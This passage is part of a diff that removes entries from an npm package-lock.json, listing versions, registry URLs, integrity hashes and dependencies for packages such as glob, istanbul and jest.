"sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", - "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==", - "engines": { - "node": "*" - } - }, - "node_modules/fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true - }, - "node_modules/fsevents": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz", - "integrity": "sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==", - "dev": true, - "hasInstallScript": true, - "optional": true, - "os": [ - "darwin" - ], - "engines": { - "node": "^8.16.0 || ^10.6.0 || >=11.0.0" - } - }, - "node_modules/function-bind": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", - "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", - "dev": true, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true, - "engines": { - "node": "6.* || 8.* || >= 10.*" - } - }, - "node_modules/get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true, - "engines": { - "node": ">=8.0.0" - } - }, - "node_modules/get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", - "dependencies": { - "assert-plus": "^1.0.0" - } - }, - "node_modules/glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "dev": true, - "dependencies": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - }, - "engines": { - "node": "*" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/glob-parent": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/glob-parent/-/glob-parent-6.0.2.tgz", - "integrity": "sha512-XxwI8EOhVQgWp6iDL+3b0r86f4d6AX6zSU55HfB4ydCEuXLXc5FcYeOu+nnGftS4TEju/11rt4KJPTMgbfmv4A==", - "dev": true, - "peer": true, - "dependencies": { - "is-glob": "^4.0.3" - }, - "engines": { - "node": ">=10.13.0" - } - }, - "node_modules/globals": { - "version": "13.20.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-13.20.0.tgz", - "integrity": "sha512-Qg5QtVkCy/kv3FUSlu4ukeZDVf9ee0iXLAUYX13gbR17bnejFTzr4iS9bY7kwCf1NztRNm1t91fjOiyx4CSwPQ==", - "dev": true, - "peer": true, - "dependencies": { - "type-fest": "^0.20.2" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/graceful-fs": { - "version": "4.2.11", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", - "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", - "dev": true - }, - "node_modules/graphemer": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/graphemer/-/graphemer-1.4.0.tgz", - "integrity": "sha512-EtKwoO6kxCL9WO5xipiHTZlSzBm7WLT627TqC/uVRd0HKmq8NXyebnNYxDoBi7wt8eTWrUrKXCOVaFq9x1kgag==", - "dev": true, - "peer": true - }, - "node_modules/har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==", - "engines": { - "node": ">=4" - } - }, - "node_modules/har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", - "deprecated": "this library is no longer supported", - "dependencies": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/hasown": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", - "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", - "dev": true, - "dependencies": { - "function-bind": "^1.1.2" - }, - "engines": { - "node": ">= 0.4" - } - }, - "node_modules/html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "node_modules/http-signature": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", - "dependencies": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" - }, - "engines": { - "node": ">=0.8", - "npm": ">=1.3.7" - } - }, - "node_modules/human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true, - "engines": { - "node": ">=10.17.0" - } - }, - "node_modules/ignore": { - "version": "5.2.4", - "resolved": "https://registry.npmjs.org/ignore/-/ignore-5.2.4.tgz", - "integrity": "sha512-MAb38BcSbH0eHNBxn7ql2NH/kX33OkB3lZ1BNdh7ENeRChHTYsTvWrMubiIAMNS2llXEEgZ1MUOBtXChP3kaFQ==", - "dev": true, - "peer": true, - "engines": { - "node": ">= 4" - } - }, - "node_modules/import-fresh": { - "version": "3.3.0", - "resolved": "https://registry.npmjs.org/import-fresh/-/import-fresh-3.3.0.tgz", - "integrity": "sha512-veYYhQa+D1QBKznvhUHxb8faxlrwUnxseDAbAp457E0wLNio2bOSKnjYDhMj+YiAq61xrMGhQk9iXVk5FzgQMw==", - "dev": true, - "dependencies": { - "parent-module": "^1.0.0", - "resolve-from": "^4.0.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/import-local": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.2.0.tgz", - "integrity": "sha512-2SPlun1JUPWoM6t3F0dw0FkCF/jWY8kttcY4f599GLTSjh2OCuuhdTkJQsEcZzBqbXZGKMK2OqW1oZsjtf/gQA==", - "dev": true, - "dependencies": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - }, - "bin": { - "import-local-fixture": "fixtures/cli.js" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true, - "engines": { - "node": ">=0.8.19" - } - }, - "node_modules/inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "dev": true, - "dependencies": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "node_modules/inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "node_modules/is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "node_modules/is-core-module": { - "version": "2.15.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.15.1.tgz", - "integrity": "sha512-z0vtXSwucUJtANQWldhbtbt7BnL0vxiFjIdDLAatwhDYty2bad6s+rijD6Ri4YuYJubLzIJLUidCh09e1djEVQ==", - "dev": true, - "dependencies": { - "hasown": "^2.0.2" - }, - "engines": { - "node": ">= 0.4" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/is-extglob": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/is-extglob/-/is-extglob-2.1.1.tgz", - "integrity": "sha512-SbKbANkN603Vi4jEZv49LeVJMn4yGwsbzZworEoyEiutsN3nJYdbO36zfhGJ6QEDpOZIFkDtnq5JRxmvl3jsoQ==", - "dev": true, - "peer": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "engines": { - "node": ">=8" - } - }, - "node_modules/is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/is-glob": { - "version": "4.0.3", - "resolved": "https://registry.npmjs.org/is-glob/-/is-glob-4.0.3.tgz", - "integrity": "sha512-xelSayHH36ZgE7ZWhli7pW34hNbNl8Ojv5KVmkJD4hBdD3th8Tfk9vYasLM+mXWOZhFkgZfxhLSnrwRr4elSSg==", - "dev": true, - "peer": true, - "dependencies": { - "is-extglob": "^2.1.1" - }, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true, - "engines": { - "node": ">=0.12.0" - } - }, - "node_modules/is-obj": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/is-obj/-/is-obj-2.0.0.tgz", - "integrity": "sha512-drqDG3cbczxxEJRoOXcOjtdp1J/lyp1mNn0xaznRs8+muBhgQcrnbspox5X5fOw0HnMnbfDzvnEMEtqDEJEo8w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/is-path-inside": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/is-path-inside/-/is-path-inside-3.0.3.tgz", - "integrity": "sha512-Fd4gABb+ycGAmKou8eMftCupSir5lRxqf4aD/vd0cD2qc4HL07OjCeuHMr8Ro4CoMaeCKDB0/ECBOVWjTwUvPQ==", - "dev": true, - "peer": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" - }, - "node_modules/isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==" - }, - "node_modules/isomorphic-ws": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", - "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", - "peerDependencies": { - "ws": "*" - } - }, - "node_modules/isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" - }, - "node_modules/istanbul-lib-coverage": { - "version": "3.2.2", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.2.tgz", - "integrity": "sha512-O8dpsF+r0WV/8MNRKfnmrtCWhuKjxrq2w+jpzBL5UZKTi2LeVWnWOmWRxFlesJONmc+wLAGvKQZEOanko0LFTg==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-instrument": { - "version": "6.0.3", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-6.0.3.tgz", - "integrity": "sha512-Vtgk7L/R2JHyyGW07spoFlB8/lpjiOLTjMdms6AFMraYt3BaJauod/NGrfnVG/y4Ix1JEuMRPDPEj2ua+zz1/Q==", - "dev": true, - "dependencies": { - "@babel/core": "^7.23.9", - "@babel/parser": "^7.23.9", - "@istanbuljs/schema": "^0.1.3", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^7.5.4" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-lib-instrument/node_modules/semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-lib-report": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.1.tgz", - "integrity": "sha512-GCfE1mtsHGOELCU8e/Z7YWzpmybrx/+dSTfLrvY8qRmaY6zXTKWn6WQIjaAFw069icm6GVMNkgu0NzI4iPZUNw==", - "dev": true, - "dependencies": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^4.0.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "dependencies": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-reports": { - "version": "3.1.7", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.7.tgz", - "integrity": "sha512-BewmUXImeuRk2YY0PVbxgKAysvhRPUQE0h5QRM++nVWyubKGV0l8qQ5op8+B2DOmwSe63Jivj0BjkPQVf8fP5g==", - "dev": true, - "dependencies": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/jackspeak": { - "version": "3.4.3", - "resolved": "https://registry.npmjs.org/jackspeak/-/jackspeak-3.4.3.tgz", - "integrity": "sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw==", - "dependencies": { - "@isaacs/cliui": "^8.0.2" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - }, - "optionalDependencies": { - "@pkgjs/parseargs": "^0.11.0" - } - }, - "node_modules/jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.7.0.tgz", - "integrity": "sha512-NIy3oAFp9shda19hy4HK0HRTWKtPJmGdnvywu01nOqNC2vZg+Z+fvJDxpMQA88eb2I9EcafcdjYgsDthnYTvGw==", - "dev": true, - "dependencies": { - "@jest/core": "^29.7.0", - "@jest/types": "^29.6.3", - "import-local": "^3.0.2", - "jest-cli": "^29.7.0" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-changed-files": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.7.0.tgz", - "integrity": "sha512-fEArFiwf1BpQ+4bXSprcDc3/x4HSzL4al2tozwVpDFpsxALjLYdyiIK4e5Vz66GQJIbXJ82+35PtysofptNX2w==", - "dev": true, - "dependencies": { - "execa": "^5.0.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-circus": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.7.0.tgz", - "integrity": "sha512-3E1nCMgipcTkCocFwM90XXQab9bS+GMsjdpmPrlelaxwD93Ad8iVEjX/vvHPdLPnFf+L40u+5+iutRdA1N9myw==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^1.0.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.7.0", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0", - "pretty-format": "^29.7.0", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-cli": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.7.0.tgz", - "integrity": "sha512-OVVobw2IubN/GSYsxETi+gOe7Ka59EFMR/twOU3Jb2GnKKeMGJB5SGUUrEz3SFVmJASUdZUzy83sLNNQ2gZslg==", - "dev": true, - "dependencies": { - "@jest/core": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "create-jest": "^29.7.0", - "exit": "^0.1.2", - "import-local": "^3.0.2", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "yargs": "^17.3.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-config": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.7.0.tgz", - "integrity": "sha512-uXbpfeQ7R6TZBqI3/TxCU4q4ttk3u0PJeC+E0zbfSoSjq6bJ7buBPxzQPL0ifrkY4DNu4JUdk0ImlBUYi840eQ==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-jest": "^29.7.0", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@types/node": "*", - "ts-node": ">=9.0.0" - }, - "peerDependenciesMeta": { - "@types/node": { - "optional": true - }, - "ts-node": { - "optional": true - } - } - }, - "node_modules/jest-diff": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.7.0.tgz", - "integrity": "sha512-LMIgiIrhigmPrs03JHpxUh2yISK3vLFPkAodPeo0+BuF7wA2FoQbkEg1u8gBYBThncu7e1oEDUfIXVuTqLRUjw==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "diff-sequences": "^29.6.3", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-docblock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.7.0.tgz", - "integrity": "sha512-q617Auw3A612guyaFgsbFeYpNP5t2aoUNLwBUbc/0kD1R4t9ixDbyFTHd1nok4epoVFpr7PmeWHrhvuV3XaJ4g==", - "dev": true, - "dependencies": { - "detect-newline": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-each": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.7.0.tgz", - "integrity": "sha512-gns+Er14+ZrEoC5fhOfYCY1LOHHr0TI+rQUHZS8Ttw2l7gl+80eHc/gFf2Ktkw0+SIACDTeWvpFcv3B04VembQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "jest-util": "^29.7.0", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-environment-node": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.7.0.tgz", - "integrity": "sha512-DOSwCRqXirTOyheM+4d5YZOrWcdu0LNZ87ewUoywbcb2XR4wKgqiG8vNeYwhjFMbEkfju7wx2GYH0P2gevGvFw==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-get-type": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.6.3.tgz", - "integrity": "sha512-zrteXnqYxfQh7l5FHyL38jL39di8H8rHoecLH3JNxH3BwOrBsNeabdap5e0I23lD4HHI8W5VFBZqG4Eaq5LNcw==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-haste-map": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.7.0.tgz", - "integrity": "sha512-fP8u2pyfqx0K1rGn1R9pyE0/KTn+G7PxktWidOBTqFPLYX0b9ksaMFkhK5vrS3DVun09pckLdlx90QthlW7AmA==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-leak-detector": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.7.0.tgz", - "integrity": "sha512-kYA8IJcSYtST2BY9I+SMC32nDpBT3J2NvWJx8+JCuCdl/CR1I4EKUJROiP8XtCcxqgTTBGJNdbB1A8XRKbTetw==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-matcher-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.7.0.tgz", - "integrity": "sha512-sBkD+Xi9DtcChsI3L3u0+N0opgPYnCRPtGcQYrgXmR+hmt/fYfWAL0xRXYU8eWOdfuLgBe0YCW3AFtnRLagq/g==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-message-util": { - "version": "29.7.0", - "resolved": 